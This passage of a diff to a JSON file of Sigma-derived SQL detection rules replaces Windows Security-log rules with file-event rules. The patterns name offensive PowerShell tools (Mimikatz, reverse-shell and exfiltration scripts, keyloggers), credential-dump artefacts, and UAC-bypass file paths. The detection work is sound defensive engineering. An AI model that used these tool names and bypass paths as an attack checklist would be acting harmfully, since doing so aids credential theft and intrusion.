LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", + "tags": [ + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", - "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "status": "experimental", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Faulty legacy applications" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "status": "test", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask 